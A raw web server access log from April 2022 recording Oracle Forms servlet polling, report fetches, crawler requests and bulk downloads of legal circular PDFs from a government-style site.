200.118.64.109 - - [16/Apr/2022:14:53:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 3703
200.118.64.109 - - [16/Apr/2022:14:53:50 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:14:54:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:14:54:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:14:54:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:14:54:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:14:54:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:14:54:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:14:54:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 108
200.118.64.109 - - [16/Apr/2022:14:54:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:14:54:29 -0500] "GET /reports/rwservlet/getjobid75099?server=repnomi HTTP/1.1" 200 48038
66.249.65.13 - - [16/Apr/2022:14:55:12 -0500] "-" 408 -
200.118.64.109 - - [16/Apr/2022:14:55:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:14:55:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:14:55:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [16/Apr/2022:14:55:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 112
200.118.64.109 - - [16/Apr/2022:14:55:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:14:55:30 -0500] "GET /reports/rwservlet/getjobid75100?server=repnomi HTTP/1.1" 200 47883
200.118.64.109 - - [16/Apr/2022:14:56:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
190.145.16.70 - - [16/Apr/2022:14:56:22 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
190.145.16.70 - - [16/Apr/2022:14:56:23 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [16/Apr/2022:14:56:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
172.22.2.4 - - [16/Apr/2022:14:56:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
216.245.221.92 - - [16/Apr/2022:14:58:19 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:14:58:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.102.5.201 - - [16/Apr/2022:15:00:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19jbCBmD2LExTyAl5srLgfmC1wQ+2zvRNz/DIuC2Dr+ZCuTWZmFWfM4OO8gZ+81tHSYfqOXUJJvJBlKLqsjXz7Sbq1aRgCqvOlYufzZwoEFM/z1Rhjg327foxUz7kh1O7lkIWTBcaCiLUeNHr65mmtq+40nhyzf4coVZ1o6dm0+jEqSCUcf+2hbMadgP6WOE+6bspB3TN6XRdzc7Hs+xdjv84tA1sx8VVmQN4AowC4TRf0fcru58zw7lwWVRZ8tIPLVB7c8pjXQ8A==&u=U2FsdGVkX1+GLt1MCpoguli7mCP3fyZjPy936Rr2Uf4Jby7WNyuBmVMhPFaC6cJ2&y=U2FsdGVkX1/e38PatUCb3D8jgXTBnjlvql2gQuqvEvRxtXhA6AbHKsof/lh4W+Jp HTTP/1.1" 200 25
200.118.64.109 - - [16/Apr/2022:15:00:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.102.5.201 - - [16/Apr/2022:15:00:36 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1+My5YTXDHk1xOtwqGcI/e2VQeWNNmun1gAmV24EwQxx90mJRFP2epQB1LxfjjEgHGWr2oP5winXlm+4UQdxBnZITwfEyTe88XzEsSQz4+hnK9c4wpUSCdxjRa5fwq4vGQHerzOASKXOA==&u=U2FsdGVkX1+GLt1MCpoguli7mCP3fyZjPy936Rr2Uf4Jby7WNyuBmVMhPFaC6cJ2&y=U2FsdGVkX1/e38PatUCb3D8jgXTBnjlvql2gQuqvEvRxtXhA6AbHKsof/lh4W+Jp HTTP/1.1" 200 60
66.249.65.13 - - [16/Apr/2022:15:01:26 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:15:00:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:15:02:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:01:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62201
35.236.215.231 - - [16/Apr/2022:15:03:18 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 200 959
35.236.215.231 - - [16/Apr/2022:15:03:18 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 200 959
216.245.221.92 - - [16/Apr/2022:15:03:19 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:15:04:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:04:54 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 304 -
200.118.64.109 - - [16/Apr/2022:15:06:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [16/Apr/2022:15:08:19 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:15:08:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.65.13 - - [16/Apr/2022:15:09:40 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:15:08:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
172.22.2.4 - - [16/Apr/2022:15:08:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
200.118.64.109 - - [16/Apr/2022:15:10:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:15:12:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [16/Apr/2022:15:13:19 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.115 - - [16/Apr/2022:15:13:25 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342653
172.22.2.4 - - [16/Apr/2022:15:11:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:15:14:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:12:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61796
207.46.13.199 - - [16/Apr/2022:15:15:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 304 -
66.249.65.13 - - [16/Apr/2022:15:16:21 -0500] "-" 408 -
200.118.64.109 - - [16/Apr/2022:15:16:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [16/Apr/2022:15:18:19 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:15:18:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:17:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:15:18:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
200.118.64.109 - - [16/Apr/2022:15:20:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:15:22:22 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.65.13 - - [16/Apr/2022:15:22:39 -0500] "-" 408 -
216.245.221.92 - - [16/Apr/2022:15:23:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Apr/2022:15:22:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45631
201.245.192.253 - - [16/Apr/2022:15:23:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45480
200.118.64.109 - - [16/Apr/2022:15:24:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:15:26:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
199.59.150.183 - - [16/Apr/2022:15:26:45 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
157.55.39.132 - - [16/Apr/2022:15:26:49 -0500] "-" 408 -
199.59.150.182 - - [16/Apr/2022:15:26:54 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
216.245.221.92 - - [16/Apr/2022:15:28:19 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:15:28:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.65.13 - - [16/Apr/2022:15:28:44 -0500] "-" 408 -
103.178.237.134 - - [16/Apr/2022:15:28:52 -0500] "POST /goform/webLogin HTTP/1.1" 404 1186
200.118.64.109 - - [16/Apr/2022:15:30:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [16/Apr/2022:15:32:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [16/Apr/2022:15:33:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Apr/2022:15:32:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45631
201.245.192.253 - - [16/Apr/2022:15:33:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45480
200.118.64.109 - - [16/Apr/2022:15:34:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.65.13 - - [16/Apr/2022:15:34:53 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:15:33:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:15:34:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
200.118.64.109 - - [16/Apr/2022:15:36:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:35:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
216.245.221.92 - - [16/Apr/2022:15:38:19 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [16/Apr/2022:15:38:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:39:22 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [16/Apr/2022:15:39:24 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000009%20DEL%2001%20DE%20OCTUBRE%20DEL%202021.pdf HTTP/1.1" 200 320793
172.22.2.4 - - [16/Apr/2022:15:39:31 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000007%20DEL%2010%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [16/Apr/2022:15:39:38 -0500] "GET /BLA/boletinlegal/Circulares/2021/CIRCULAR%20No.%2000006%20DEL%2005%20DE%20AGOSTO%20DEL%202021.pdf HTTP/1.1" 200 249615
172.22.2.4 - - [16/Apr/2022:15:39:44 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
172.22.2.4 - - [16/Apr/2022:15:39:51 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%2000010%20del%2027%20de%20julio%20de%202020.pdf HTTP/1.1" 200 422655
172.22.2.4 - - [16/Apr/2022:15:39:59 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 200 307959
172.22.2.4 - - [16/Apr/2022:15:40:05 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000014%20del%2001%20de%20septiembre%20del%202020.pdf HTTP/1.1" 200 320826
172.22.2.4 - - [16/Apr/2022:15:40:11 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%2012%20del%2014%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 344384
172.22.2.4 - - [16/Apr/2022:15:40:21 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%20006%20del%2008%20de%20Febrero%20de%202019.pdf HTTP/1.1" 200 674401
200.118.64.109 - - [16/Apr/2022:15:40:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:40:31 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200015%20del%2003%20de%20Octubre%20de%202019.pdf HTTP/1.1" 200 165608
172.22.2.4 - - [16/Apr/2022:15:40:39 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 159877
172.22.2.4 - - [16/Apr/2022:15:40:43 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200003%20del%2031%20de%20Enero%20de%202019.pdf HTTP/1.1" 200 164676
172.22.2.4 - - [16/Apr/2022:15:40:50 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000020%20del%2020%20de%20diciembre%20de%202019.pdf HTTP/1.1" 200 145170
172.22.2.4 - - [16/Apr/2022:15:40:59 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
66.249.65.13 - - [16/Apr/2022:15:41:00 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:15:41:06 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [16/Apr/2022:15:41:09 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2011%20del%2024%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 169541
172.22.2.4 - - [16/Apr/2022:15:41:09 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [16/Apr/2022:15:41:13 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%2010%20del%2021%20de%20Septiembre%20de%202018.pdf HTTP/1.1" 200 163426
172.22.2.4 - - [16/Apr/2022:15:41:18 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%200015%20del%207%20de%20Diciembre%20de%202018.pdf HTTP/1.1" 200 165305
172.22.2.4 - - [16/Apr/2022:15:41:22 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 200 515008
172.22.2.4 - - [16/Apr/2022:15:41:30 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%202%20del%201%20de%20Septiembre%20de%202017.pdf HTTP/1.1" 200 152575
172.22.2.4 - - [16/Apr/2022:15:41:38 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%201%20del%2030%20de%20Marzo%20de%202017.pdf HTTP/1.1" 200 668532
172.22.2.4 - - [16/Apr/2022:15:41:44 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%2007%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 309906
172.22.2.4 - - [16/Apr/2022:15:41:49 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 200 965526
172.22.2.4 - - [16/Apr/2022:15:41:55 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
172.22.2.4 - - [16/Apr/2022:15:42:02 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 200 660637
172.22.2.4 - - [16/Apr/2022:15:42:07 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%203%20del%2014%20de%20Noviembre%20de%202014.pdf HTTP/1.1" 200 104132
172.22.2.4 - - [16/Apr/2022:15:42:12 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%202%20del%2021%20de%20septiembre%20de%202014.pdf HTTP/1.1" 200 143376
172.22.2.4 - - [16/Apr/2022:15:42:21 -0500] "GET /BLA/boletinlegal/Circulares/2014/Circular%20No.%201%20del%2008%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 180124
200.118.64.109 - - [16/Apr/2022:15:42:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:42:26 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%208%20del%201%20de%20Noviembre%20de%202013.pdf HTTP/1.1" 200 385156
172.22.2.4 - - [16/Apr/2022:15:42:33 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [16/Apr/2022:15:42:38 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 200 4210437
172.22.2.4 - - [16/Apr/2022:15:41:11 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 46815
172.22.2.4 - - [16/Apr/2022:15:42:53 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
172.22.2.4 - - [16/Apr/2022:15:42:58 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%204%20del%2005%20de%20junio%20de%202013.pdf HTTP/1.1" 200 130461
172.22.2.4 - - [16/Apr/2022:15:41:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45548
172.22.2.4 - - [16/Apr/2022:15:41:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45548
172.22.2.4 - - [16/Apr/2022:15:43:04 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%203%20del%2005%20de%20abril%20de%202013.pdf HTTP/1.1" 200 93580
172.22.2.4 - - [16/Apr/2022:15:43:09 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%202%20del%2022%20de%20enero%20de%202013.pdf HTTP/1.1" 200 85466
172.22.2.4 - - [16/Apr/2022:15:43:14 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%201%20del%2014%20de%20enero%20de%202013.pdf HTTP/1.1" 200 1298384
172.22.2.4 - - [16/Apr/2022:15:43:18 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1402289
216.245.221.92 - - [16/Apr/2022:15:43:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Apr/2022:15:43:24 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%208%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 963197
172.22.2.4 - - [16/Apr/2022:15:43:32 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 972955
201.245.192.253 - - [16/Apr/2022:15:42:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45631
172.22.2.4 - - [16/Apr/2022:15:43:42 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%206%20del%2025%20de%20Mayo%20de%202012.pdf HTTP/1.1" 200 387391
172.22.2.4 - - [16/Apr/2022:15:43:47 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%205%20del%2027%20de%20Abril%20de%202012.pdf HTTP/1.1" 200 216613
172.22.2.4 - - [16/Apr/2022:15:43:52 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 200 253045
172.22.2.4 - - [16/Apr/2022:15:43:58 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%203%20del%2023%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 572950
172.22.2.4 - - [16/Apr/2022:15:44:06 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%202%20del%2014%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 113666
172.22.2.4 - - [16/Apr/2022:15:44:11 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2016%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 381186
172.22.2.4 - - [16/Apr/2022:15:44:20 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2015%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 486506
201.245.192.253 - - [16/Apr/2022:15:43:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45480
200.118.64.109 - - [16/Apr/2022:15:44:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6eea748ea1fca4a5a88a1d59c29c86a66.e3iSbxaKaheRe3iOaNeTahmObO1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [16/Apr/2022:15:44:34 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 3427471
172.22.2.4 - - [16/Apr/2022:15:44:43 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 351421
172.22.2.4 - - [16/Apr/2022:15:44:50 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 369945
181.53.12.21 - - [16/Apr/2022:15:44:50 -0500] "-" 408 -
172.22.2.4 - - [16/Apr/2022:15:45:03 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2011%20del%2027%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 526945
172.22.2.4 - - [16/Apr/2022:15:45:09 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [16/Apr/2022:15:45:11 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2022%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 1563219
172.22.2.4 - - [16/Apr/2022:15:45:17 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 200 1118749
